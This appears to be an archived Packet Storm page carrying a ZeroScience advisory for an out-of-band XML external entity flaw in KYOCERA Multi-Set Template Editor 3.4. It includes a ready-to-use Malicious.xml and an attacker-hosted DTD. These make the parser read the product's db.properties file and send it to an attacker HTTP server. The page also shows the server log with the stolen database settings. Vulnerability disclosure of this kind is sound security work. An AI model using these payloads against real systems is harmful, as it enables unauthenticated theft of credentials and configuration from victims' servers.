what you don't know can hurt you

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection
Posted Apr 9, 2018
Authored by LiquidWorm | Site zeroscience.mk

KYOCERA Multi-Set Template Editor version 3.4.0906 suffers from an out-of-band XML external entity injection vulnerability.

tags | exploit, xxe
MD5 | 0c8850a036da5916bbb8e718eccc4d21

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection

Change Mirror Download

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection


Vendor: KYOCERA Corporation
Product https://global.kyocera.com
Affected version: 3.4.0906

Summary: KYOCERA Net Admin is Kyocera's unified
device management software that uses a web-based
platform to give network administrators easy and
uncomplicated control to handle a fleet for up to
10,000 devices. Tasks that used to require multiple
programs or walking to each printer can now be
accomplished in a single, fast and modern environment.

Desc: KYOCERA Multi-Set Template Editor (part of Net
Admin) suffers from an unauthenticated XML External Entity
(XXE) injection vulnerability using the DTD parameter
entities technique resulting in disclosure and retrieval
of arbitrary data from the affected node via out-of-band
(OOB) channel attack. The vulnerability is triggered when
input passed to the Multi-Set Template Editor (kmmted.exe)
called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll
is not sanitized while parsing a 5.x Multi-Set template XML
file.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache Tomcat/8.5.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5459
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php


28.03.2018

---


Malicious.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://192.168.1.71:7777/xxe.xml">
%remote;
%root;
%oob;]>


Attacker's xxe.xml:

<!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\db.properties">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:7777/?%fetch;'> ">


Data retrieval:

lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777
Serving HTTP on 0.0.0.0 port 7777 ...
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 -
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 -

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close